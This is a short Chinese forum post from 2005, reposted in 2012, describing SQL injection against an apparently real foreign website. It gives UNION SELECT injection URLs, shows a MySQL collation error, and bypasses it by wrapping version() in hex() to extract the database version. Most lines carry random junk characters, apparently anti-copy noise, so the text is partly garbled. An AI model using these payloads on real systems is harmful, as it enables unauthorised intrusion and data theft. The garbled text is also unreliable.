本文作者:SuperHei
8 R1 O1 z$ l* M* U3 x7 f! X文章性质:原创
0 s" P: h2 j/ M+ O发布日期:2005-10-18: x s/ S& w$ g) I- S
测试个国外的站时:( c. i! _+ {8 j$ @4 b) f; j
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*% c; x3 R" ~5 J' U: S
返回错误:0 Z1 j1 C( @9 E) n, V
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
# X, j% @0 i* B& S. kMySQL Error No. 1269 y5 r2 ^; S! n; l( z4 t3 ~' T
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。% l2 T/ H# K( A& I
解决办法:转为其他编码如hex。$ N6 @! Q5 ?) S: V
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*" [6 F/ B) |7 w/ E3 t# Y8 W
成功得到hex(version())的值为:
. V% _ O) a" q' c3 g! M, Q342E312E332D62657461* e+ S& p6 K3 H. A" d6 z7 C3 e: ~" G
回Mysql查询下得到:3 b+ b/ U k9 B6 E
mysql> select 0x342E312E332D62657461;9 p* S- r* r: Q2 x' s
+------------------------+
( N% [; O+ A0 k% k/ g0 m| 0x342E312E332D62657461 |
" s/ v" l; U' |+ E! [. ^# ?6 X, N+------------------------+
% @* H& L2 y) |! f/ U( v3 @| 4.1.3-beta |$ U# T3 C5 T: [" z9 A- K, X. `& l. J
+------------------------+
" A/ S- ^1 H* j9 e n' _: ?" m8 Z1 row in set (0.00 sec)
3 Z5 j, C j2 Y- h, Y$ \- ]3 h$ P1 T5 E- A c8 i; q5 f4 H9 c7 Q
|
发表于 2012-9-15 14:04:54
收藏
支持
反对